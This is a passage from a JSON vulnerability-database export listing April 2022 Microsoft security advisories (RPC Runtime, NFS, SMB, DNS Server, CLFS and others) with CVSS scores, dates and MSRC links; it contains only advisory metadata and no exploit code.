"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-13T09:15:00", "id": "AKAMAIBLOG:A37E08A92B8D58375143A320413C6011", "href": "https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-27T14:45:29", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24492, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T07:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-12T07:00:00", "id": "MS:CVE-2022-24528", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24528", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:18", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24492, CVE-2022-24528.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-19T07:00:00", "id": "MS:CVE-2022-26809", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:19", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24528, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24492", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24492", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:19", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24497.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24491", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24491", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:31", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24491.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-05T07:00:00", "id": "MS:CVE-2022-24497", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24497", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:19", "description": "Windows Server Service Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Server Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24541"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24541", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24541", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:29", "description": "Windows Kernel Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-12T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2022-04-12T07:00:00", "id": "MS:CVE-2022-24483", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24483", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-05-27T14:45:22", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26904", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:30", "description": "Windows SMB Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T07:00:00", "type": "mscve", "title": "Windows SMB Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-04-12T07:00:00", "id": "MS:CVE-2022-24500", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24500", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:53", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:32", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2022>) for more information.\n\nGoogle is aware that an exploit for CVE-2022-1096 exists in the wild.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-26T07:00:00", "type": "mscve", "title": "Chromium: CVE-2022-1096 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-05-10T07:00:00", "id": "MS:CVE-2022-1096", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:27", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24481.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24521", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:21", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24521.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24481", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26821", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26821", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26822", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26822", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26818", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26818", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": 